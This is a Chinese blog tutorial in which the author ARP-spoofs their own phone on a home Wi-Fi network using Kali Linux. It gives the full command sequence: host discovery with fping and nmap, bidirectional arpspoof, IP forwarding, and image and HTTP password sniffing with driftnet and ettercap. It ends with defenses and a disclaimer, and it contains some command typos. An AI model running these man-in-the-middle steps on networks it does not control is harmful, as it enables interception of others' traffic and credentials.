尝试KALI linux进行arp欺骗

2次阅读

共计 2369 个字符,预计需要花费 6 分钟才能阅读完成。

前言
进行 arp 欺骗尝试纯属意外的看到了网上的一个视频觉得这个很有意思,所以我也想进行的一个尝试。实验是在攻击主机是我本人的手机,请各位同学一定要遵守法律,做一名有理想、有道德、有文化、有纪律的好青(zhong)年。以下命令均在终端中运行。本篇文章仅限于学习、交流。请勿用于非法用途与活动。
所用的工具

kali linux
nmap
arpspoof
ettercap
driftnet

kali linux 简介:Kali Linux 是一个基于 Debian 的 Linux 发行版,旨在进行高级渗透测试和安全审计。Kali 中包含有对各种信息安全任务,如渗透测试,安全性研究,计算机取证和逆向工程面向数百款工具。Kali Linux 由领先的信息安全培训公司 Offensive Security 开发,资助和维护。
为什么选择 kali linux:
Kali linux 系统包含了 600 多款渗透测试工具,包括 Armitage(图形网络攻击管理工具),Nmap(端口扫描程序),Wireshark(数据包分析程序),John the Ripper 密码破解程序,Aircrack-ng(a 用于渗透测试无线局域网的软件套件),Burp 套件和 OWASP ZAP Web 应用安全扫描器,这些工具可以用于漏洞分析、密码攻击、无线攻击、逆向工程、ARP 欺骗等等,而且这些工具本身就已经内置于系统之中,不需要开发人员开发,直接就可以使用。nmap、arpspoof、ettercap、driftnet 这些工具都已安装,开箱即用。
ARP 欺骗是什么和其原理
什么是 arp 欺骗:ARP 欺骗(英语:ARP spoofing)(ARP 的全称是 Address Resolution Protocol,直译过来是 地址解析协议。),又称 ARP 毒化(ARP poisoning,网上上多译为 ARP 病毒)或 ARP 攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者 PC 的网关 MAC 地址,使访问者 PC 错以为攻击者更改后的 MAC 地址是网关的 MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机无法正常连线。最早探讨 ARP 欺骗的文章是由 Yuri Volobuev 所写的《ARP 与 ICMP 转向游戏》(ARP and ICMP redirection games)。
arp 欺骗的原理:
1. 一般情况下,ARP 欺骗并不是使网络无法正常通信, 而是通过冒充网关或其他主机使得到达网关或主机的流量通过攻击进行转发。通过转发流量可以对流量进行控制和查看, 从而控制流量或得到机密信息。

2.ARP 欺骗发送 arp 应答给局域网中其他的主机, 其中包含网关的 IP 地址和进行 ARP 欺骗的主机 MAC 地址; 并且也发送了 ARP 应答给网关, 其中包含局域网中所有主机的 IP 地址和进行 arp 欺骗的主机 MAC 地址。当局域网中主机和网关收到 ARP 应答跟新 ARP 表后, 主机和网关之间的流量就需要通过攻击主机进行转发。冒充主机的过程和冒充网关相同。

开始进行 arp 欺骗
1. 首先要知道我们的网关是多少 windows 平台用快捷键 win+ R 输入 cmd 回车 输入 ipconfig 记下图中最下方的默认网关地址 192.168.2.1.
接着打开 kalilinux(我的 kali 安装在了 virtualbox 虚拟机)输入:ifping 查看做自己的网卡和 ip,分别为 eth0、192.168.2.207

2 发现我们同 wifi 下的设备:fping -g -r 0 -s 192.168.2.1/24 | grep alive -g 通过指定开始和结束地址来生成目标列表(例如:./fping –g 192.168.1.0 192.168.1.255)或者一个 IP/ 掩码形式(例如:./fping –g 192.168.2.1/24) -r (当 ping 失败时,最大重试次数 ( 默认为 3 次))
3 确定我们要进行 arp 的目标:nmap -T4 -O 192.168.2.166 192.168.2.207 192.168.2.208 192.168.2.232 -T4 是为了让他结束的更快 -O 启用 os 检测。目标是我的手机努比亚:NX531J-xiyanXY.lan ip:192.168.2.233
4 开始进行 arp 欺骗
arpspoof -i eth0 (eth0 是网卡) 192.168.2.233(要进行欺骗的 ip 地址)192.168.2.1(网关地址)
再打开一个终端输入(将网关地址和被攻击的 ip 地址调换位置进行)进行双向欺骗:
arpspoof -i eth0 (eth0 是网卡) 192.168.2.1(网关地址)192.168.2.233(要进行欺骗的 ip 地址)
此时手机应该就连不上网了 5 进行端口转发:echo 1 > /porc/sys/net/ipv4/ip_forward 此命令为临时开启端口转发。

cat /porc/sys/net/ipv4/ip_forward 这条是查看否成功开启转发。
开启以后手机应该就可以上网了 6 进行图片嗅探:dritnet -i eth07 进行密码嗅探仅限 http 协议的网站 ettercap -Tq -i eth0 但是密码嗅探失败了
总结
经此看出我们的信息安全多么的不安全。且经过高手的升级也已经有了嗅探 https 协议的方法了。arp 欺骗已经是很古老的方法了放在现在却依然有可以获得我们隐私的地方。防止被 arp 欺骗的方法有很多例如现在很多的路由器都支持防御 arp 欺骗。安装对 ARP 欺骗工具的防护软件采用静态的 ARP 缓存,在各主机上绑定网关的 IP 和 MAC 地址。在网关上绑定各主机的 IP 和 MAC 地址。
再次声明:实验是在攻击主机是我本人的手机,请各位同学一定要遵守法律,做一名有理想、有道德、有文化、有纪律的好青(zhong)年。以下命令均在终端中运行。本篇文章仅限于学习、交流。请勿用于非法用途与活动。

正文完
 0